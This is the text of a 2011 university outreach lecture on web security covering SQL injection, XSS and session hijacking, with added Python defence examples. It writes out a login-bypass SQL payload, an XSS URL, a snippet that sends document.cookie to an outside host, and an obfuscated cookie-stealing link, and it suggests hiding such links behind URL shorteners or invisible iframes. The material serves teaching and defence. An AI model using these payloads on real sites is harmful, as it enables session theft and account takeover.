National Central University Computer Center, "Multimedia and Network Applications" IT outreach course
Introduction to Web Application Security
Date: 2011/03/27   Instructor: 張竟 (Computer Science, 3rd year)   cwebb [dot] tw [at] gmail [dot] com
Agenda
Chit-chat
OWASP Top 10
SQL injection
XSS
cookie & session
2
Don't do bad things!
4
Don't get caught!
5
Don't get caught!
6
Don't say I taught you.
7
Agenda
Chit-chat
OWASP Top 10
SQL injection
XSS
cookie & session
8
Web security?
The early days vs. today
Static vs. dynamic
Wherever there is code, there are vulnerabilities!
9
ways to attack
OS
web server
web application
10
attack scenarios
attack the web server: gain privileges, steal information, then use the server to attack its users
attack other users: steal their information, launch further attacks
the two may be combined
11
Agenda
Chit-chat
OWASP Top 10
SQL injection
XSS
cookie & session
12
13
OWASP Top 10 - 2010
A1: Injection
A2: Cross-Site Scripting (XSS)
A3: Broken Authentication and Session Management
A4: Insecure Direct Object References
A5: Cross-Site Request Forgery (CSRF)
14
OWASP Top 10 - 2010
A6: Security Misconfiguration
A7: Insecure Cryptographic Storage
A8: Failure to Restrict URL Access
A9: Insufficient Transport Layer Protection
A10: Unvalidated Redirects and Forwards
15
Agenda
Chit-chat
OWASP Top 10
SQL injection
XSS
cookie & session
18
Injections
The hacker's fill-in-the-blanks game
Where can an attacker inject?
database (MySQL, MS SQL, PostgreSQL ...)
NoSQL
directory service (LDAP)
system commands!!
19
how SQL works in web
login page, for example (three parties: client, web server, SQL server)
client -> web server: request with id and pwd
web server -> SQL server: select * from account where `id`=id and `pwd`=pwd
SQL server -> web server: return result
web server -> client: return login success/failed
20
Why SQL?
Widely used
Stores large amounts of site data
Injection friendly
21
how do injections work?
Take MySQL as an example:
$query = "select * from account where `id`='$id' and `pwd`='$pwd'";
$id = ' or 1=1 -- 
-> select * from account where `id`='' or 1=1 -- ' and `pwd`='$pwd'
(everything after -- is a comment, so the password check is gone and 1=1 matches every row)
22
attack skills
union
blind attack
23
Impact
Data stolen / tampered with
Attacker gains privileges on the site
The whole site is taken over
24
how to defend
use a safe API
escape special characters; never splice user input directly into the query
scan the code for vulnerabilities with a tool
25
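The string-concatenated login query from the slides next to the parameterised "safe API" the defense slide recommends, as an added Python/sqlite3 example (not code from the deck): the in-memory `account` table and the alice/s3cret row are constructed for the demo, and the injected id is the slide's own `' or 1=1 -- `.

```python
import sqlite3


def make_db():
    """Constructed sample data: an in-memory stand-in for the deck's MySQL `account` table."""
    db = sqlite3.connect(":memory:")
    db.execute("create table account (id text, pwd text)")
    db.execute("insert into account values ('alice', 's3cret')")
    return db


def login_vulnerable(db, uid, pwd):
    """Builds the query by string concatenation, exactly like the slide's PHP $query.
    Whatever the user typed is parsed as SQL, so `' or 1=1 -- ` rewrites the WHERE clause
    and comments out the password comparison."""
    query = f"select * from account where `id`='{uid}' and `pwd`='{pwd}'"
    return db.execute(query).fetchone() is not None


def login_safe(db, uid, pwd):
    """Parameterised query, the 'safe API' from the defense slide: the driver binds the
    values after the statement is parsed, so the same input is compared as a literal id
    string and matches no row."""
    query = "select * from account where `id`=? and `pwd`=?"
    return db.execute(query, (uid, pwd)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 -- "  # the slide's injected id
    print("vulnerable:", login_vulnerable(db, payload, "anything"))  # True: logged in with no password
    print("safe:      ", login_safe(db, payload, "anything"))        # False: treated as a literal id
```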
Practice
26
Agenda
Chit-chat
OWASP Top 10
SQL injection
XSS
cookie & session
27
XSS
Cross Site Scripting
Writing your own code on someone else's website!
28
background knowledge
HTTP GET
HTTP POST
29
how to attack
attack using POST/GET
the "scripting"
in the server
strange url
30
how to attack
javascript
<iframe> / <image>
31
example
<body> <?php echo "Hello " . $_GET['id']; ?></body>
http://goodsite.com/?id=<script>alert("i'm Orange")</script>
32
what may happen?
it takes you to a malicious site
it sends your information to the attacker
Just For Fun!
33
Just For Fun Samy
MySpace XSS attack
Samy is my hero!
Infection
34
Big sites are XSSable too
MySpace
Plurk
...
35
how to defend
for the server
what must be escaped must still be escaped
scan the code for vulnerabilities with a tool
for the user
be alert when you see a strange link
browser / antivirus software
36
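The `echo "Hello " . $_GET['id']` page from the XSS example rendered with and without the escaping the defense slide calls for, plus a crude "strange link" check for the user-side advice, as an added Python example that is not the deck's code; the demo URL is the slide's own goodsite.com link, and `looks_like_xss` is a heuristic invented here.

```python
import html
from urllib.parse import parse_qs, urlsplit

PAGE = "<body>Hello {}</body>"
# The slide's demo link (goodsite.com is the slide's placeholder host).
DEMO_URL = 'http://goodsite.com/?id=<script>alert("i\'m Orange")</script>'


def render_vulnerable(user_id):
    """echo "Hello " . $_GET['id'];  -- the value is spliced into the HTML untouched,
    so a <script> in the URL runs in every visitor's browser under goodsite.com's origin."""
    return PAGE.format(user_id)


def render_escaped(user_id):
    """The fix from the defense slide: escape what must be escaped. html.escape turns
    < > & " ' into entities, so the browser shows the text instead of executing it."""
    return PAGE.format(html.escape(user_id, quote=True))


def id_from_url(url):
    """Extract the `id` query parameter, percent-decoded (parse_qs decodes %3C etc.),
    which is what the browser hands the server as $_GET['id']."""
    return parse_qs(urlsplit(url).query).get("id", [""])[0]


def looks_like_xss(value):
    """Heuristic (invented here, not from the deck) for the 'be alert at strange links'
    advice: a tag-opening '<' together with a script/iframe/img tag or an event handler."""
    lowered = value.lower()
    return "<" in lowered and any(
        marker in lowered for marker in ("script", "iframe", "img", "onerror", "onload")
    )


if __name__ == "__main__":
    injected = id_from_url(DEMO_URL)
    print(render_vulnerable(injected))  # the <script> tag survives, so alert() would run
    print(render_escaped(injected))     # &lt;script&gt;... is displayed as plain text
    print("strange link?", looks_like_xss(injected))
```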
practice
37
Agenda
Chit-chat
OWASP Top 10
SQL injection
XSS
cookie & session
38
background knowledge
cookie
session
A cookie is a piece of text stored by a user's web browser. A cookie can be used for authentication, storing site preferences, shopping cart contents, the identifier for a server-based session, or anything else that can be accomplished through storing text data.
The session information is stored on the web server using the session identifier (session ID) generated as a result of the first (sometimes the first authenticated) request from the end user running a web browser. The "storage" of session IDs and the associated session data (user name, account number, etc.) on the web server is accomplished using a variety of techniques including, but not limited to: local memory, flat files, and databases.
39
40
41
If you manage to steal the cookie, you can ....
42
how to steal it?
43
44
Send the cookie off to the cloud!
Use GET / POST to make the page send the cookie away: <img> / <iframe>
ex: ["<img src='http://in1.ncu.cc/~975002063/keke/t.php?t=", document.cookie, "'>"].join("")
The server side is simple: just store the cookie.
45
What idiot would click a link like this?
http://example.com/?samname=%22%3E%3Cscript%3Edocument.write%28[String.fromCharCode%2860,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,105,110,49,46,110,99,117,46,99,99,47,126,57,55,53,48,48,50,48,54,51,47,107,101,107,101,47,116,46,112,104,112,63,116,61,34%29,document.cookie,String.fromCharCode%2834,39,62%29].join%28%29%29;%3C/script%3E%3C%22
46
hidden
There is a thing called URL shorteners (tinyurl.com / 0rz.tw / goo.gl / bit.ly)
Stuff it into another page (e.g. an iframe with width/height set to 0 or 1)
ugly URLs are EVERYWHERE:
https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1eic6yu9oa4y3&scc=1&ltmpl=default&ltmplcache=2
https://login.yahoo.com/config/login?.intl=tw&.pd=c%3d7pP3Kh2p2e4XklntZWWfDLAC8w--&.done=https://tw.login.yahoo.com/cgi-bin/kcookie.cgi/www/http%3a//tw.yahoo.com&rl=1
47
Countermeasures
lock the session to the user agent / headers
bind the session to the client IP
* don't get attacked successfully in the first place *
48
lock the session to the user agent / headers
// On the first request, remember a hash of the client's User-Agent in the session;
// on later requests, drop the session if the User-Agent no longer matches.
if (isset($_SESSION['HTTP_USER_AGENT'])) {
    if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT'])) {
        exit();   // header mismatch: treat the session as hijacked
    }
} else {
    $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);
}
But ... if someone can steal your cookie, can't they get your headers too?
49
Practice
50
Q&A?
51
end
52
Reference
53
http://www.owasp.org/
http://en.wikipedia.org/
http://goo.gl/cA3a
http://goo.gl/IwGbX
http://goo.gl/uQ4I1